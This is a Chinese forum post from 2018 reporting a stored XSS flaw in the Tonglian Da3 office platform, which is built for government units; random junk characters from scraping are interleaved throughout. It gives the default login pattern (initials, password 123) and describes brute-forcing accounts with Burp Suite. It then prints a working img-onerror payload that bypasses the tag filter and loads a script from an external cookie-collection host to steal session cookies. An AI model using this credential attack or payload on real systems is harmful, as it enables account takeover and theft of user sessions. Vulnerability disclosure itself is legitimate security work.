2 {( T1 P9 E L- X7 T1 I
, l. c" J/ [# Z0 J* g( B 同联Da3协同办公平台后台通用储存型xss漏洞2 v* @; K. Q6 G, w9 h
9 D- k7 A) ^) Y+ h" Z4 s+ _/ z6 D. V
" U# w3 _! _& k
平台简介:
$ s M7 t7 o+ t
5 V. B s9 f v% F
4 S- D( h0 G+ O9 r9 ^6 N
) @0 y' n9 j; e
6 c4 l7 r' }3 k) i
. Y6 A5 g, F& L/ T 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 V b* F# {9 Q) O$ @% X同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 f- T% E0 _' [/ K d
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!; e# ~( W( v- v( |; ~5 [( ^
' Z d/ y) s4 I6 p$ x8 n
& D* ^/ D5 t! X; C% N$ R$ x
0 Q2 r$ R* @$ o4 G' b. [
2 j U$ k1 _; I/ `/ q$ A
* N( b' K* a. Z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:7 `$ K8 g" v5 Z
2 G @5 Q/ {" l. z/ i' }1 D
7 C% O q- s3 ?( X) u; U
4 y7 o; X- y3 w" a& g q
( t$ O; W$ v& ~" S, G
+ K( H1 ~- [6 S0 p- I8 y6 h
http://1.1.1.1:7197/cap-aco/#(案例2-)
4 T3 T" t7 _7 A# G+ n& `
5 g! Z$ g* Z! b: u6 S
2 T1 I3 K$ w: g& z: `& K2 P http://www.XXOO.com (案例1-官网网站) ^4 y4 D7 ?+ f
. K4 D, c- Y9 ~" i3 j
: Z- V/ [8 I8 J3 z* }. u+ F 漏洞详情:
1 d: v% ? f/ G. _ j/ w* O
- ?/ V% q* j) {* q: z% i- W
- ~6 Z# g( a1 O( ~* v! C
案例一、
0 y6 ^& v) b* j
* e5 j2 l1 J0 j8 X
" l6 |& }" O, I. T9 Z5 y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 A5 s3 i; M: W5 v/ l! z% j; O# r
# d9 z( w/ E+ m) j v4 f$ {2 \
" x3 s8 L9 f4 J5 f 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
/ g6 ?! F$ d! r, U! a
+ f& f2 w& S4 b9 D6 R' Z
: i+ ^2 m* k. i @0 J
# w4 G8 ?* S3 `: G8 j/ B
( `! k* p9 c% H# M! ?( T2 I) X
# o' n7 d4 y3 n2 p
i* E1 `* W9 ^3 F
8 B. s0 T- k/ J# w% g/ q, l 8 X, m& k; M+ Z- R2 X- H
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ( q; }5 q z# D! @7 w& d8 t% j
3 l" f2 }2 k+ ^3 `6 ]
) h% i Z7 H- |' e
; y# a, r/ Z2 L0 d6 B1 v7 ~
" z d, z8 Q% q$ t/ p6 {
% T$ P4 z7 p: p& }$ ` y 
& ?, D' g( a' Z% N$ ?5 {- H
6 l1 ?5 l2 Y2 y( a2 p5 K
7 P! J1 \% \6 h7 Q
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
& t3 v3 Q' I' i0 u3 Q9 J0 I5 U! ^8 V
! w$ Q; e+ F9 B4 o7 y . w, @/ Q" [5 ^
( u8 c# f7 b; v( F: w
& Y2 Q1 i# ~( J. e7 Z! D
# t5 [7 }/ h( b' ?0 v. H e( l, u
<img src=x! \2 y/ k9 O4 |0 B
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
* } _$ U. g' y
# e0 ?2 b, o6 m: @4 o4 U
- p* f, O+ U9 J% T# p* A# U
2 l/ W, J' [- N4 C4 R, c
! Z4 R" J( V- |1 A* m( v
, H- ?1 N+ D( w* [ 然后发送,接收cookie如图:
$ y: y' P5 i- U# {8 ]3 |. d* _
# T$ L9 j5 z- V. w8 T
: F# V5 Y: d* I1 v6 u# i9 T: s2 D , B9 v9 v& C; T! d0 \
) A) ^5 X; E4 i6 {6 |
% k9 ]( }+ B9 ]& E2 ] \, p
! b8 E" U2 I! {
, s# R0 \' i) p; Y0 [4 [" x
2 U% I- K6 O8 L( D$ \6 {2 _/ L
$ {1 }! k4 r+ W' |1 B6 l7 ^
( ?) W1 z, ~! T( Y& Y* x8 X
% o3 E8 N- g- @; e+ Y# [
$ V4 [* v. j( n/ J2 M1 p4 t3 ?. e* ~/ c
: R+ W, S) b/ j
) c, L9 Q8 D$ \* | 
7 D+ t* W G) x3 j# W" R
4 Q% `0 u1 R2 \
1 ~" v0 J+ P1 o+ N; g+ J( |# y2 S
: |: ]. N# N j: j! c; L
$ }; j+ z! q: x, q' @% U8 F, }! f
9 `# u2 ]0 a3 Z
& S; K7 R$ f3 s1 q- H
2 ~6 E( L, ]+ `8 w% F, b3 B$ c( r
i9 [$ y0 `% ]- n% I; W J 案例2、
- h1 h' z& x* f$ }1 Q- Y
0 P G9 i" n8 A E
5 g7 {7 G" [9 j# y
前面步骤都一样,下面看效果图:
# K* b( J6 u, t" E6 Z
, S" U( d% D. L! g9 ]9 s
9 r; K& b: j) [% l# j 
- y3 Y' {) j( i0 m8 W; l
+ P0 _7 c+ K0 h5 B
, k% Y1 G3 d z+ m
! w/ g4 _) l6 k5 ~% V
: }" V+ K' z1 r" H , a7 b* T/ s ^% m& L/ Q& u( G
- }" m3 ^' A* K
6 p; j9 G& c$ g: |$ ^/ ^. b/ @
' I4 @8 h: F; X" b6 G' B, O 1 R5 S( Y D6 W" W/ P
) U( T B/ f# e1 c* G& L7 | 8 C% `% [" E; k! T4 { [
5 u( h0 @5 d& z% d
2 u. d2 Z* U( w) r I2 R
* u0 ^; ?: u3 I6 V% f! \
% s0 `9 ^: L: p$ P, H" a
5 z3 m- V8 x0 Q+ C: O) Z
; E# K }- X8 Q+ f+ T; o/ s0 }
& {! U) X( `* \+ o
" ?6 R3 Y- v* ]3 Z9 \6 A& }4 S5 E $ n) |9 R- q9 n: @ h ]- J
6 r$ `; T1 T1 m! [' O# W. N
; u3 y& k: \4 P3 D$ ^8 p! `4 p% \
3 r- ] \5 i/ u0 y4 ] 1 W+ C8 ]0 `4 }+ K% h
; h1 p% T9 K" ]: U1 {3 d. e) w
发表于 2018-10-20 20:14:15
收藏
支持
反对